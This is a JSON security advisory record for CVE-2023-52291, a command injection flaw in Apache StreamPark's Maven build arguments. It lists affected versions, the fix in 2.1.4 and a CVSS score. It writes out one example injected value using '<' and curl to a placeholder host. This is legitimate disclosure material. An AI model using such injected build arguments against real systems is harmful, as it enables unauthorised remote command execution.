{"id":"CVE-2023-52291","details":"In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\n\nBackground:\n\nIn the \"Project\" module, the maven build args  “\u003c” operator causes command injection. e.g : “\u003c (curl  http://xxx.com )” will be executed as a command injection,\n\nMitigation:\n\nall users should upgrade to 2.1.4,  The \"\u003c\" operator will blocked。","aliases":["GHSA-7g94-hfqc-q993"],"modified":"2026-03-14T14:54:57.013070Z","published":"2024-07-17T09:15:02.410Z","references":[{"type":"ARTICLE","url":"http://www.openwall.com/lists/oss-security/2024/07/17/1"},{"type":"ARTICLE","url":"https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf"}],"affected":[{"ranges":[{"type":"GIT","repo":"https://github.com/apache/incubator-streampark","events":[{"introduced":"6788ebae61d2f6d5122572229ce0a3a2555cc46d"},{"fixed":"c3c468c9192dd87b4ae430a41735bde7a391dfba"}],"database_specific":{"versions":[{"introduced":"2.0.0"},{"fixed":"2.1.4"}]}}],"versions":["v2.0.0","v2.0.0-rc7","v2.1.0","v2.1.0-rc1","v2.1.1","v2.1.1-rc1","v2.1.2","v2.1.2-rc1","v2.1.2-rc2","v2.1.2-rc3","v2.1.2-rc4","v2.1.3","v2.1.3-rc1","v2.1.4-rc1"],"database_specific":{"source":"https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2023-52291.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"}]}